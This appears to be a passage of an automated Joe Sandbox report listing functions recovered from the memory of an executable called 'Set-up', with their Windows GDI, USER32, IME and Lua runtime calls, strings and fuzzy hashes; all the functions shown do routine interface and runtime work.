DeleteObject.GDI32(?), ref: 00A6CB7B

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: DeleteObject$CreateRect$CombineIndirect
String ID:
API String ID: 343578399-0
Opcode ID: 77e174dcc0e404a4a81a25b35031e21e283ae7e665b9d0bf8cd9c5c3fd3a369c
Instruction ID: f64c7ee4d80c406f3f0df24d995a7fa9fcec2d4a782dcfd818ab701965f25437
Opcode Fuzzy Hash: 77e174dcc0e404a4a81a25b35031e21e283ae7e665b9d0bf8cd9c5c3fd3a369c
Instruction Fuzzy Hash: 3F41F7B2F0020EABCF017FD0D9467FEBBB4EF45790F204595E986B3291E62549258EC0

Function 00A692B0 Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00A692C4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00A6936C
SendMessageW.USER32(?,000001A8,?,00000000), ref: 00A693F8
SendMessageW.USER32(?,00000180,00000000,00000001), ref: 00A69410
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00A69423
InvalidateRect.USER32(?,00000000,00000001), ref: 00A69430

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: MessageSend$InvalidateRect_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 324257846-0
Opcode ID: 57899c5ea2f4274152366976b2336fa2a6894b96445176a4405054f8c449fac8
Instruction ID: 434d1fc44a651e3de573327b652fe97c92ae047d57d6920137b0574cdf968c81
Opcode Fuzzy Hash: 57899c5ea2f4274152366976b2336fa2a6894b96445176a4405054f8c449fac8
Instruction Fuzzy Hash: E151B131600205ABDF258F68CC84BAE7BBAAF88700F14815CE9569F3D5DB719945CB90

Function 00A72900 Relevance: 9.1, APIs: 6, Instructions: 133COMMON

Download Yara Rule

APIs

ImmGetContext.IMM32(?), ref: 00A7294A
ImmSetCompositionWindow.IMM32(00000000,00000002,?,?,?,?), ref: 00A729B9
memset.VCRUNTIME140 ref: 00A72A14
MulDiv.KERNEL32(?,?,00001C20), ref: 00A72A49
ImmSetCompositionFontW.IMM32(00000000,?,?), ref: 00A72AA0
ImmReleaseContext.IMM32(?,00000000), ref: 00A72ACB

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: CompositionContext$FontReleaseWindowmemset
String ID:
API String ID: 1667481158-0
Opcode ID: d17d351faeb05767c78639403a5e3b1ab45819de866d4854d4eb4bab51e33177
Instruction ID: b4a4c9cd6d8d5c24799a39263ad22bd6fe3eef81d0916e2a27c7beb08786a50b
Opcode Fuzzy Hash: d17d351faeb05767c78639403a5e3b1ab45819de866d4854d4eb4bab51e33177
Instruction Fuzzy Hash: 8051D270A002099FEB14CF64C889BADFBB9FF44304F14826DE40E97291DB356945CB90

Function 00A742D0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,00000000), ref: 00A74301
SetWindowLongW.USER32(?,00000000,00000000), ref: 00A74393

Part of subcall function 00BFE3CE: EnterCriticalSection.KERNEL32(00C62BB4,?,?,?,00A6FD26,00C63028), ref: 00BFE3D9
Part of subcall function 00BFE3CE: LeaveCriticalSection.KERNEL32(00C62BB4,?,?,?,00A6FD26,00C63028), ref: 00BFE416

__Init_thread_footer.LIBCMT ref: 00A74356

Part of subcall function 00BFE384: EnterCriticalSection.KERNEL32(00C62BB4,?,?,00A6FD46,00C63028), ref: 00BFE38E
Part of subcall function 00BFE384: LeaveCriticalSection.KERNEL32(00C62BB4,?,?,00A6FD46,00C63028), ref: 00BFE3C1

DefWindowProcW.USER32(?,?,?,?), ref: 00A743BA
SetWindowLongW.USER32(?,00000000,00000000), ref: 00A74405
DefWindowProcW.USER32(?,00000082,?,?), ref: 00A74417

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Window$CriticalSection$Long$EnterLeaveProc$Init_thread_footer
String ID:
API String ID: 2953339707-0
Opcode ID: 0852d6fff9cb75aa87b0c627bb7a3c86a33434388bf033cccd2baa8f900f9000
Instruction ID: 22764c5b26c8dcde1b7fc0358c9f9d782b2208d4f82f75550cffbd61347d28dd
Opcode Fuzzy Hash: 0852d6fff9cb75aa87b0c627bb7a3c86a33434388bf033cccd2baa8f900f9000
Instruction Fuzzy Hash: BB410472A04248EFDB11CF54DC45FAEBBB5FB48720F108169FA0697390C7729A10DBA1

Function 00A6C840 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

truncf.API-MS-WIN-CRT-MATH-L1-1-0(?,70576E16), ref: 00A6C88D
truncf.API-MS-WIN-CRT-MATH-L1-1-0(?,70576E16), ref: 00A6C8A4
GetSystemMetrics.USER32(00000044), ref: 00A6C8D5
MulDiv.KERNEL32(00000000,?,00000060), ref: 00A6C8E8
GetSystemMetrics.USER32(00000045), ref: 00A6C92B
MulDiv.KERNEL32(00000000,?,00000060), ref: 00A6C93E

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: MetricsSystemtruncf
String ID:
API String ID: 3296196346-0
Opcode ID: 90c7c48e1cd78122e123f5144430a6b8eacd61866fad95d2be18bcea819ade62
Instruction ID: 274a33ae9add0d1a495ef33581805402c823d2a7534b778dd9a29283cc94c78f
Opcode Fuzzy Hash: 90c7c48e1cd78122e123f5144430a6b8eacd61866fad95d2be18bcea819ade62
Instruction Fuzzy Hash: B8416871A0121AEFDB148F95D988BBEBF74FB04721F514559E9A573280C3346930CFA5

Function 00A63220 Relevance: 9.1, APIs: 6, Instructions: 104COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?), ref: 00A63267
DeleteObject.GDI32(00000000), ref: 00A6326C

Part of subcall function 00A6B270: memcpy.VCRUNTIME140(00000000,?,?,00A632E3,?,?,75296BA0,00A632E3,?,?), ref: 00A6B345

CreateSolidBrush.GDI32(?), ref: 00A63281
SelectObject.GDI32(?,00000000), ref: 00A6328E
Polygon.GDI32(?,00000000,?), ref: 00A632F5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A63324

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Object$Select$BrushCreateDeletePolygonSolid_invalid_parameter_noinfo_noreturnmemcpy
String ID:
API String ID: 3423700353-0
Opcode ID: 8d10e1e1d26e952c68bedb31fa22d9c2bef57698c4aaa36dad9bde8d2b65e660
Instruction ID: ff9495cb14c52c1d940d2b2653b3f9b081604f22d1cf48af238b3de45aa7baf5
Opcode Fuzzy Hash: 8d10e1e1d26e952c68bedb31fa22d9c2bef57698c4aaa36dad9bde8d2b65e660
Instruction Fuzzy Hash: 34415E76900609EFCF04DFA4CC44BAEBBB5FF48310F118229E915A7650D735AA55CF90

Function 00A73110 Relevance: 9.1, APIs: 6, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000042), ref: 00A73159
GlobalLock.KERNEL32(00000000), ref: 00A73169
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?), ref: 00A731A8
GlobalAlloc.KERNEL32(00000042), ref: 00A731B8
GlobalLock.KERNEL32(00000000), ref: 00A731C8
MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,?), ref: 00A731E5

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Global$AllocByteCharLockMultiWide
String ID:
API String ID: 3395854362-0
Opcode ID: a89f87ec4cc9d905db0f415e2566a4e46b01c23982f30c193e1889d78acfb186
Instruction ID: b979df42a70edd58658843570ee0aba1a434ed1a53d882b77495d80a58134d51
Opcode Fuzzy Hash: a89f87ec4cc9d905db0f415e2566a4e46b01c23982f30c193e1889d78acfb186
Instruction Fuzzy Hash: DE2181726003019BCB10DF65DC89F6A7BB8EF45311F15866DF909DB291DB31D901DBA1

Function 00A62980 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 264COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00A629EB
lroundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A62A0C
CreateFontIndirectW.GDI32(?), ref: 00A62AB3
memset.VCRUNTIME140 ref: 00A62C0E

Strings

en-us, xrefs: 00A62B75

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memset$CreateFontIndirectlroundf
String ID: en-us
API String ID: 1453837966-3889756054
Opcode ID: c6c6782ba6439e75dab2239e2084cbac9e912f0c0b2c4c946028eadcc6e3622e
Instruction ID: bd16dff20a95963afff29ae58f42b3d078553a14ab079d0fa29a2cbc51212ff9
Opcode Fuzzy Hash: c6c6782ba6439e75dab2239e2084cbac9e912f0c0b2c4c946028eadcc6e3622e
Instruction Fuzzy Hash: 2DB17B70A0025ADFDB24CF64DD85BAEBBB4FF04300F0585E8E54AAB285D7719A99CF50

Function 00A65A10 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 256COMMON

Download Yara Rule

APIs

Part of subcall function 00A6B710: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,75296BA0,00A632E3), ref: 00A6B85D

roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A65C1F
roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A65C2E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A65CBB

Strings

gfff, xrefs: 00A65C8A
gfff, xrefs: 00A65BC0

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: roundf$_invalid_parameter_noinfo_noreturnmemcpy
String ID: gfff$gfff
API String ID: 1395518917-3084402119
Opcode ID: 3adaa40cafe91b2342c589888fb9fb20c7a6b5670d1e0868069e1e0ab179fa08
Instruction ID: a5ea189261fc354cbf0d18213cd456e6ae91b43fd2f4b50100d9cc638612425d
Opcode Fuzzy Hash: 3adaa40cafe91b2342c589888fb9fb20c7a6b5670d1e0868069e1e0ab179fa08
Instruction Fuzzy Hash: 9BA10171E00219DFCB04CFA9D984AADBFB5FF88300F658159E845BB289D730A965CF94

Function 00A682A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00A68269), ref: 00A68330
GetWindowLongW.USER32(?,000000FA), ref: 00A68384
CreateWindowExW.USER32(00000100,ListBoxX,00C0DC74,80040000,00000064,00000064,00000096,00000050,?,00000000,00000000), ref: 00A683AE
MapWindowPoints.USER32(?,00000000,00000001,00000001), ref: 00A683FB

Strings

ListBoxX, xrefs: 00A683A4

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Window$CreateLongPoints_invalid_parameter_noinfo_noreturn
String ID: ListBoxX
API String ID: 412080474-1947864590
Opcode ID: 6f48c3512cfe50aad15e49d649b6257daccfb5a48d3b72ba38161134165e1ab1
Instruction ID: d6a22ddb067d350125f8dfe9aa5ff337171e4650479a83f504c3a62766054e00
Opcode Fuzzy Hash: 6f48c3512cfe50aad15e49d649b6257daccfb5a48d3b72ba38161134165e1ab1
Instruction Fuzzy Hash: 1241ACB12003019FDB24CF28D889B6ABFF4FF84710F048A69F9959B286D774D864CB61

Function 00BDC320 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

lua_checkstack.SET-UP(?,?), ref: 00BDC331
lua_pushcclosure.SET-UP(?,?,?), ref: 00BDC396
luaL_error.SET-UP(?,stack overflow (%s),too many upvalues), ref: 00BDC415

Strings

stack overflow (%s), xrefs: 00BDC40F
too many upvalues, xrefs: 00BDC40A

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_errorlua_checkstacklua_pushcclosure
String ID: stack overflow (%s)$too many upvalues
API String ID: 913152060-3471891533
Opcode ID: 27197b9742829a667ec6249af7862d56209516870c46eb2e2586e9b79b836fb1
Instruction ID: d8d82e802c4e5c2664f5798dd3c7abd79cfa5bdb360b38fb443cf8edddb3d20d
Opcode Fuzzy Hash: 27197b9742829a667ec6249af7862d56209516870c46eb2e2586e9b79b836fb1
Instruction Fuzzy Hash: B331AD75A006058FCB14CF19D880A5AFBE5FF84321B14C5AEE81A8B352EB30E901CF95

Function 00BE0110 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

luaL_setfuncs.SET-UP(?,00C382E0,00000000), ref: 00BE0185
luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BE019D
luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BE01B4

Strings

version mismatch: app. needs %f, Lua core provides %f, xrefs: 00BE01AE
multiple Lua VMs detected, xrefs: 00BE0197

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_error$L_setfuncs
String ID: multiple Lua VMs detected$version mismatch: app. needs %f, Lua core provides %f
API String ID: 2970048142-3403695784
Opcode ID: 8183245586c888bfc5fcfc7a3107ba3e22055c917b64c565db912e2efd4b5864
Instruction ID: c73cf421ac453141fed579ae1fd464472de7991b9b534b16a8a7f67ca5f27481
Opcode Fuzzy Hash: 8183245586c888bfc5fcfc7a3107ba3e22055c917b64c565db912e2efd4b5864
Instruction Fuzzy Hash: 0121F4B16007049BC710BF18D845B5ABBE4EF04710F10C5D9FD899B392EB75AC558BCA

Function 00BDBA20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?), ref: 00BDBA2D
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 00BDBA35
lua_pushfstring.SET-UP(?,cannot %s %s: %s,read,?,?), ref: 00BDBA96

Strings

read, xrefs: 00BDBA8F
cannot %s %s: %s, xrefs: 00BDBA90

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _errnolua_pushfstringstrerror
String ID: cannot %s %s: %s$read
API String ID: 1081185838-1204257098
Opcode ID: f40dbc2f4593ded1abc5a6b92bd54a19ff8ca028029fe23a707c20594258aaf2
Instruction ID: 527f267047cef471c82e840e36750f5adee33c52cdaaef46a6f9c3e27a73fe35
Opcode Fuzzy Hash: f40dbc2f4593ded1abc5a6b92bd54a19ff8ca028029fe23a707c20594258aaf2
Instruction Fuzzy Hash: A411D371B002449BDB14AB2C9C95A2FB2E5DF80315B5580BAF80A8B357FE75DC15C7D2

Function 00BF9130 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

luaL_setfuncs.SET-UP(?,00C38AA0,00000000), ref: 00BF91A5
luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BF91BD
luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BF91D4

Strings

version mismatch: app. needs %f, Lua core provides %f, xrefs: 00BF91CE
multiple Lua VMs detected, xrefs: 00BF91B7

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_error$L_setfuncs
String ID: multiple Lua VMs detected$version mismatch: app. needs %f, Lua core provides %f
API String ID: 2970048142-3403695784
Opcode ID: 10df19beb663bc9f33b24c8e0ad351d4154564f7a3cb78c47ca6b905f9b185a5
Instruction ID: 66efd579f81598c59381d9b5f11ee5634f0665ca5c355a16edc1439a5d17cb86
Opcode Fuzzy Hash: 10df19beb663bc9f33b24c8e0ad351d4154564f7a3cb78c47ca6b905f9b185a5
Instruction Fuzzy Hash: 6E11C6B1B00619ABC6107A14CC4AB6A77D4EF00714F1089E8FD95972D2EB75AA198BCA

